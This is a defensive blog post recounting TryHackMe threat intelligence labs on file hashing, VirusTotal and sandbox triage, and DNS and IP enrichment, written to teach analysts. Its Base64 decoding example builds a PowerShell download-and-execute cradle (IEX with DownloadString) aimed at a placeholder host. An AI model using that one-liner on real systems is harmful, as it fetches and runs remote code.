
Threat Intelligence for Investigators — Practical Lessons from TryHackMe CTI Labs

  • Writer: DFIRHive
  • Oct 19
  • 9 min read

Updated: Oct 19


https://www.dfirhive.com/post/threat-intelligence-for-investigators-practical-lessons-from-tryhackme-cti-labs

When we’re in the middle of a live investigation, it’s never the full picture that lands first. We get fragments — a domain from proxy logs, a hash from memory, an IP address from firewall alerts.

On their own, these are just strings.

But once we start enriching them, they begin to tell a story — who registered that domain, what infrastructure sits behind that IP, what malware family that hash belongs to.

That’s what Cyber Threat Intelligence (CTI) does for DFIR. It’s the bridge between what you see on disk and what’s really happening outside your network.

Recently, I worked through a few TryHackMe rooms on CTI — Intro to Threat Intelligence, File & Hash Threat Intelligence, and Domain & IP Threat Intelligence.


They weren’t just exercises; they mirrored the same steps we take during live response.


Here’s how those lessons translate directly into day-to-day DFIR work.



You can find all three labs under TryHackMe’s Threat Intelligence track.





Understanding CTI in Action


CTI isn’t about collecting feeds — it’s about adding context. In forensic terms, it turns data into intelligence.


When a disk image gives us a list of suspicious IPs, CTI helps answer:

  • Who owns this IP?

  • Has it been seen in attacks before?

  • What kind of infrastructure is behind it?


When we pull a binary from /tmp/, CTI tells us:

  • What malware family it belongs to

  • Which C2 domains it contacts

  • Whether other analysts have seen it before


In short: Forensics shows the “what.” CTI helps explain the “why.”



Lab 1 — Intro to Threat Intelligence


When I started the Intro to Threat Intelligence lab, it felt theoretical at first — definitions, frameworks, and acronyms. But halfway through, it clicked. It wasn’t about memorizing terms — it was about learning to see context behind every incident.


From Data to Intelligence:


The lab began by breaking down a simple hierarchy:

  • Data: Raw values like IPs or hashes.

  • Information: Structured and labeled — e.g., “this IP is a C2.”

  • Intelligence: Actionable — who owns it, how it behaves, and what to do about it.


That shift changed how I approached investigations. Instead of collecting endless data, I started asking: What does this actually tell me?


The CTI Lifecycle


The six stages — Direction, Collection, Processing, Analysis, Dissemination, and Feedback — sound textbook, but they’re what we unconsciously follow in every case.

Intelligence isn’t finished when you report it; it’s finished when others can act on it.



Indicators and Behavior


The exercises highlighted the difference between IOCs, IOAs, and TTPs:


  • IOCs tell you what happened (hash, domain, IP).

  • IOAs show how it happened (execution, persistence).

  • TTPs explain why — the attacker’s behavior and strategy.


An example — a Base64-encoded PowerShell command — turned from a “malicious script” into mapped ATT&CK techniques:

  • T1059.001: Command and Scripting Interpreter (PowerShell)

  • T1105: Ingress Tool Transfer


It shows how an IOC becomes real intelligence only when linked to behavior.
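The decoding step itself is quick to automate. Here is a minimal Python sketch; the command string is a made-up example, not one from the lab. The key detail is that PowerShell's -EncodedCommand takes Base64 over UTF-16LE, which is why a naive ASCII decode produces garbage.

```python
import base64

def decode_powershell(encoded: str) -> str:
    """Decode a PowerShell -EncodedCommand payload (Base64 over UTF-16LE)."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Build a sample the same way an attacker would, then decode it.
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/p.ps1')"
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
print(decode_powershell(encoded))
```

Once decoded, the behavior maps straight to the techniques above: the DownloadString call is the Ingress Tool Transfer, and the invocation itself is the PowerShell sub-technique.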


Structured Sharing

The lab also introduced STIX, TAXII, and TLP — standards that make intel shareable and consistent.
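To make "structured sharing" concrete, here is a sketch of what a single hash indicator can look like as a STIX 2.1 object. Field values are illustrative; a production feed (or the stix2 Python library) would model TLP as proper marking-definition objects rather than a plain label.

```python
import json
import uuid
from datetime import datetime, timezone

def make_indicator(sha256: str, tlp: str = "TLP:AMBER") -> dict:
    """Build a minimal STIX 2.1 indicator for a file hash (illustrative)."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": now,
        "modified": now,
        "pattern": f"[file:hashes.'SHA-256' = '{sha256}']",
        "pattern_type": "stix",
        "valid_from": now,
        # TLP shown as a plain label here for readability only
        "labels": ["malicious-activity", tlp],
    }

print(json.dumps(make_indicator("a" * 64), indent=2))
```

Anything shaped like this can be pushed over TAXII, which is what makes the standards worth the ceremony: the consumer's tooling can parse it without asking you what the columns mean.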


If you want to work through this lab yourself, head over to the official TryHackMe website.


Lab 2 — File & Hash Threat Intelligence


If the first lab was about understanding what threat intelligence means, this one was about what it looks like in practice. The File and Hash Threat Intelligence room dives into the part of investigations where an alert turns into a binary — and our job is to decide if that file is bait, benign, or genuinely malicious.


The scenario was simple: an EDR flagged multiple binaries across endpoints during a normal sweep. The task was to triage them within an hour — verify, enrich, and decide. That single workflow — verify → enrich → decide — became the anchor of the lab.

Step 1: Filepaths Tell Stories


Before touching the file, the lab made you slow down and look at its name and location. A file’s path is often its first confession.

  • Double extensions (invoice.pdf.exe): hides executable intent from users.

  • System impersonation (scvhost.exe): mimics Windows binaries to blend in.

  • Temporary storage (C:\Windows\Temp\): used for ephemeral payloads.

  • Writable system paths (C:\ProgramData\): persistence through easy access.

  • High-entropy names (jh8F21.exe): indicate automated packing.

Even without hashes, that’s already enough to decide if something deserves more attention.
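These path heuristics are easy to fold into triage tooling. A rough sketch, where the lookalike and directory lists are illustrative placeholders, not from the lab:

```python
import re
from pathlib import PureWindowsPath

SYSTEM_LOOKALIKES = {"scvhost.exe", "svch0st.exe", "lsasss.exe"}   # illustrative
SUSPECT_DIRS = {r"c:\windows\temp", r"c:\programdata", r"c:\users\public"}

def path_heuristics(path: str) -> list[str]:
    """Flag the path patterns from the table above. Heuristics only:
    a hit means 'look closer', not 'malicious'."""
    p = PureWindowsPath(path.lower())
    flags = []
    if len(p.suffixes) >= 2:                         # invoice.pdf.exe
        flags.append("double-extension")
    if p.name in SYSTEM_LOOKALIKES:                  # scvhost.exe
        flags.append("system-impersonation")
    if str(p.parent) in SUSPECT_DIRS:                # temp / writable dirs
        flags.append("suspect-directory")
    stem = p.stem
    if re.fullmatch(r"[a-z0-9]{6,}", stem) and any(c.isdigit() for c in stem):
        flags.append("high-entropy-name")            # jh8F21.exe
    return flags

print(path_heuristics(r"C:\Windows\Temp\invoice.pdf.exe"))
```

Run against an EDR's file-write telemetry, even something this crude shrinks a sweep of thousands of binaries down to a reviewable pile.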



Step 2: Hashing — Giving a File an Identity


The next step was generating file hashes — turning each binary into a unique fingerprint.


Commands used:

# Windows
certutil -hashfile bl0gger.exe SHA256
Get-FileHash -Algorithm SHA256 bl0gger.exe

# Linux
sha256sum bl0gger.exe

A few practical habits the lab reinforced:

  • Always store hashes in lowercase (avoids mismatches).

  • Hash both archives and extracted files — they may differ.

  • Even a one-byte change alters the hash completely.

  • Never record a hash without its source and timestamp.
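Those habits can be baked into a small helper. A sketch of how I'd record a hash with its provenance; the function name and record shape are my own, not from the lab:

```python
import hashlib
from datetime import datetime, timezone

def record_hash(path: str, source: str) -> dict:
    """Hash a file and record it with provenance, following the habits
    above: lowercase digest, plus source and timestamp beside the value."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):  # stream large files
            h.update(chunk)
    return {
        "sha256": h.hexdigest().lower(),   # hexdigest is already lowercase
        "source": source,
        "recorded_at": datetime.now(timezone.utc).isoformat(),
    }
```

The source and timestamp fields matter more than they look: six months later, "where did this hash come from and when" is usually the first question a reviewer asks.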



Step 3: Enriching with VirusTotal


Once the SHA256 was ready, it was time to see what the rest of the world knew.

VirusTotal became a tactical CTI platform here — not just for verdicts, but for patterns.

The key things to check:

  • Detection Score: how many vendors agree it’s malicious. Tip: check again after 24 h, since new detections roll in late.

  • Threat Labels: family or capability tags (e.g., “RedLine Stealer”). Tip: conflicting names often mean early-stage malware.

  • Upload Time: when it was first submitted. Tip: aged files with new hits can show resurgence.

  • Signatures & Certs: valid or stolen certificates. Tip: even signed binaries can be abused.

  • Relations: linked IPs/domains. Tip: pivot from these to find infra clusters.

  • Behavioral Tab: registry edits and network calls. Tip: correlate with endpoint logs before concluding.
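If you pull reports via the VirusTotal API rather than the web UI, the detection score arrives as a stats dictionary (last_analysis_stats in API v3). A hedged triage helper over that shape; the threshold and verdict wording are my own convention, not VT's:

```python
def triage_verdict(stats: dict, threshold: int = 5) -> str:
    """Summarize a VirusTotal-style last_analysis_stats dict into a quick
    triage verdict. The threshold is arbitrary: tune it to your own
    tolerance, and re-check young samples after 24 h."""
    malicious = stats.get("malicious", 0) + stats.get("suspicious", 0)
    total = malicious + stats.get("undetected", 0) + stats.get("harmless", 0)
    ratio = f"{malicious}/{total}"
    if malicious == 0:
        return f"{ratio}: no detections (re-check later; could be too new)"
    if malicious < threshold:
        return f"{ratio}: low confidence, enrich further (MalwareBazaar, sandbox)"
    return f"{ratio}: treat as malicious, pivot on relations"

print(triage_verdict({"malicious": 42, "suspicious": 3, "undetected": 20}))
```

The middle branch is the one that earns its keep: a 2/70 score is exactly the case where the next two steps, MalwareBazaar and sandboxing, decide the call.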



Step 4: Cross-Referencing with MalwareBazaar


After VirusTotal, the lab introduced MalwareBazaar, which quickly became my favorite pivot source. It complements VT by providing deeper classification and campaign context.

A few use cases that stood out:

  • Family tagging: even low-detection samples can show strong ties (e.g., #IcedID, #QakBot).

  • YARA integration: ready-to-use detection rules for your EDR or SIEM.

  • Campaign attribution: tags like #TA551 help link your sample to a known actor.


The syntax was simple but powerful:

sha256:<file_hash>

Step 5: Sandboxing — Watching It Breathe


Static data tells you what the file is. Dynamic analysis tells you what it does.


The lab demonstrated sandboxing using Hybrid Analysis and Joe Sandbox — both safe, browser-based, and insightful.

  • Hybrid Analysis excels at behaviour trees and quick MITRE mappings.

  • Joe Sandbox dives deep — system calls, memory dumps, and reverse-engineering depth.


One test file scored 100/100 in Hybrid Analysis — a clear confirmation that it was malicious. The heatmap showed ATT&CK techniques like process injection, persistence, and network beaconing — evidence you could feed directly into reports or hunt rules.



Step 6: Knowing the Limits


Sandboxes aren’t perfect. Some malware refuses to execute in virtual environments, delays payloads, encrypts traffic, or operates filelessly.

That’s where cross-referencing helps: compare sandbox data with logs, network captures, and hash intelligence.


Key Takeaways

  • Validate the exact binary before analysis.

  • Paths and filenames offer early heuristics.

  • Hash early — pivot confidently.

  • Use multiple sources (VT + MalwareBazaar) for enrichment.

  • Observe runtime behavior to confirm intent.

  • Always document findings with supporting evidence.



If you want to work through this lab yourself, head over to the official TryHackMe website.


Lab 3 — Domain & IP Threat Intelligence


This room focused on one of the most common challenges in investigations — what to do when all we have is an IP address or domain in an alert. No hash, no process tree, just a line in a proxy log. It’s a scenario every analyst faces — and this lab taught how to take that raw indicator and turn it into a decision.


Step 1 — Why It Matters


Domains and IPs are like fingerprints of infrastructure. They can belong to anything — a CDN edge node, a home router, or an attacker’s control panel. Without context, they tell nothing.

The lab showed how to build that context using a simple loop:

Verify → Enrich → Decide

Each step layers information until a picture forms.


Step 2 — Looking at Domains Through DNS


The first task began with DNS — the foundation of how domains live and move. Every time a user clicks a link, the system resolves a domain. That simple lookup carries a lot of forensic value.

The lab guided us through essential record types:

  • A / AAAA (IP mappings): rapid changes or multiple ASNs hint at flux or CDN abuse.

  • NS (nameservers): recently changed NS entries often mark new setups.

  • MX (mail servers): unusual MX on non-mail domains hints at phishing intent.

  • TXT (SPF / DKIM rules): weak or missing SPF increases phishing likelihood.

  • SOA (primary authority): identifies administrative ownership.

  • TTL (cache lifespan): low TTLs suggest frequent rotation or short-lived infra.
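These record-level checks can be rolled into a single profile pass. A sketch, where the profile dict shape is my own invention (in practice you'd build it from dig output or a passive-DNS export):

```python
def dns_red_flags(profile: dict) -> list[str]:
    """Apply the record-level heuristics above to a summarized DNS profile.
    Illustrative thresholds; every flag is a prompt to dig deeper, not a verdict."""
    flags = []
    if profile.get("ttl", 3600) < 300:
        flags.append("low TTL: frequent rotation or short-lived infra")
    if len(set(profile.get("asns", []))) > 3:
        flags.append("many ASNs: possible fast flux")
    if profile.get("mx") and not profile.get("expects_mail", False):
        flags.append("MX on a non-mail domain: possible phishing setup")
    if not profile.get("spf"):
        flags.append("weak/missing SPF: easier to spoof")
    return flags

print(dns_red_flags({"ttl": 60, "asns": [13335], "mx": [], "spf": "v=spf1 -all"}))
```

Note how the low-TTL flag alone is ambiguous (CDNs do it too), which is exactly why the next step is telling flux apart from CDN behaviour.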



Step 3 — Recognizing Attack Patterns


The lab broke down some tell-tale domain abuse patterns:

  • Fast Flux Hosting: Many IPs rotating fast across unrelated ASNs.

  • CDN Abuse: Looks similar to flux but stays within one major provider (e.g., Cloudflare).

  • Typosquatting: Fake brand lookalikes (paypa1[.]com, micros0ft[.]net).

  • IDN Spoofing: Unicode domains disguised as legitimate ones (e.g., xn--ppaypal-3ya[.]com).

Decoding these patterns visually and contextually helps you spot when something’s designed to look safe.
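Typosquat spotting also automates well. A minimal sketch using the stdlib's difflib for near-match scoring; the brand list and 0.8 cutoff are illustrative, and dedicated tools like dnstwist go much further (homoglyphs, bitsquatting, permutations):

```python
from difflib import SequenceMatcher

BRANDS = ["paypal", "microsoft", "google"]  # whatever you protect

def squat_candidates(domain: str, cutoff: float = 0.8) -> list[str]:
    """Flag lookalike second-level labels: near-matches to protected
    brands, plus punycode (IDN) labels that deserve manual inspection."""
    label = domain.split(".")[0].lower()
    hits = []
    if label.startswith("xn--"):
        hits.append("punycode label: inspect the decoded IDN manually")
    for brand in BRANDS:
        score = SequenceMatcher(None, label, brand).ratio()
        if label != brand and score >= cutoff:
            hits.append(f"near-match to '{brand}' (similarity {score:.2f})")
    return hits

print(squat_candidates("paypa1.com"))
print(squat_candidates("xn--ppaypal-3ya.com"))
```

Run over a day's newly observed domains from proxy logs, this kind of check surfaces the paypa1[.]com class of lookalikes before a user ever reports one.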


Step 4 — IP Enrichment


When we have only an IP address, the lab switched gears to RDAP — the most reliable source of ownership data. Unlike commercial GeoIP services, RDAP pulls data directly from the Regional Internet Registries (RIRs).


From RDAP, we captured:

  • NetRange: Scope of delegation

  • Organisation: Owner (hosting provider, ISP, etc.)

  • Abuse Contact: Where to report

  • Remarks: Clues on infrastructure type


This context was expanded with ASN and geolocation lookups using ipinfo.io and bgpview.io.
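RDAP responses are plain JSON (per RFC 9083), so the four fields above can be pulled out with a short helper. A sketch, assuming you have already fetched the document (e.g., from https://rdap.org/ip/ followed by the address); the summary shape is my own:

```python
def summarize_rdap(doc: dict) -> dict:
    """Extract the investigation-relevant fields from an RDAP IP response.
    Reads only a subset of the document; real responses carry much more."""
    abuse = None
    for ent in doc.get("entities", []):
        if "abuse" in ent.get("roles", []):
            # vCard properties look like ["email", {}, "text", "abuse@..."]
            for prop in ent.get("vcardArray", [None, []])[1]:
                if prop[0] == "email":
                    abuse = prop[3]
    return {
        "net_range": f'{doc.get("startAddress")} - {doc.get("endAddress")}',
        "org": doc.get("name"),
        "abuse_contact": abuse,
        "remarks": [r.get("title") for r in doc.get("remarks", [])],
    }
```

The vCard unpacking is the fiddly part; once it's written, every RIR's response yields the same four-field summary you can drop into a case note.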


Step 5 — Service Fingerprinting with Shodan & Censys


Once ownership was known, the next question was what’s running there.

Using Shodan and Censys, we looked at:

  • Open ports and banners — early signs of exposure.

  • RDP/SSH on residential ASNs → likely a compromised endpoint.

  • TLS certificates — short validity, reused SANs, or self-signed certs often link to malicious infra.

By checking crt.sh or Censys, we could pivot on certificates — find clusters of domains using the same cert, uncovering full attacker networks.



Step 6 — Reputation & History


Next came reputation checks — understanding what the IP or domain has done over time.


We used:

  • VirusTotal: Detection ratios, relations, and first-seen timestamps.

  • Cisco Talos: Category labels (malware, spam, clean).

  • IP2Proxy: To flag VPN, proxy, or Tor exits.

  • Passive DNS: To visualize how the domain’s IPs changed over days or weeks.


This historical data gave one major insight: infrastructure is fluid. An IP used for phishing today might host a blog next week. Context in time matters as much as context in space.


A domain tells you where an attacker lives. An IP tells you how they operate. Together, they tell you when to act.

If you want to work through this lab yourself, head over to the official TryHackMe website.


The Toolkit


Here are the tools I practiced with across all three CTI labs — and what each of them reveals during analysis:


  • DNS & Domain Resolution: DNS record analysis (A, MX, TXT, NS, SOA). Helps check propagation, TTL values, and DNS misconfigurations.

  • Ownership & Registration: registrar info, creation dates, netblocks, and abuse contacts. Confirms whether a domain is legitimate, new, or disposable.

  • Network Context & AS Mapping: ASN, organization type (hosting, ISP, CDN), and geolocation. Useful for identifying shared infrastructure or malicious hosting clusters.

  • Reputation & Threat Feeds: detection ratios, threat categories, blacklists, and VPN/proxy indicators. Quick validation of threat legitimacy.

  • Infrastructure History: tracks DNS/IP changes, past infrastructure, and historical web content. Key for understanding domain age and activity timeline.

  • Certificates & Subdomains: SSL transparency logs, certificate reuse, and subdomain discovery. Helps identify clusters of related infrastructure.

  • Service Fingerprinting: finds open ports, visible services, TLS banners, and versions. Great for spotting compromised servers or attacker infrastructure.

  • File Verification & Hashing (sha256sum, certutil, Get-FileHash): computes MD5, SHA1, and SHA256 hashes. Establishes integrity and enables cross-platform correlation.

  • Malware & Hash Repositories: store malware samples, tag families, link campaigns, and provide IOC exports for detection tuning.

  • Dynamic Analysis / Sandboxes: execute suspicious files in isolation to observe behavior, including process trees, persistence actions, and network calls.

  • Static Analysis Utilities (strings, PEiD, ExifTool): inspect binary metadata, embedded URLs, imports, and entropy. Help detect obfuscation and packers.

  • Network Behavior Tracking: shows domain associations, WHOIS pivots, and observed connections. Aids in infrastructure clustering.

  • Visualization & Reporting (MISP, OpenCTI, Excel, Markdown notes): structured IOC storage, TLP tagging, and analyst documentation. Makes enrichment traceable and reusable.


Wrapping It Up


What these three labs did beautifully was turn abstract “intel” into investigative muscle memory. They weren’t about memorizing platforms — they were about building a habit of asking better questions.

Now, whenever I see an IOC, my brain automatically runs through:

“Where did it come from? Who owns it? What else connects to it?”

Each question narrows the noise and moves us closer to the narrative behind the attack.




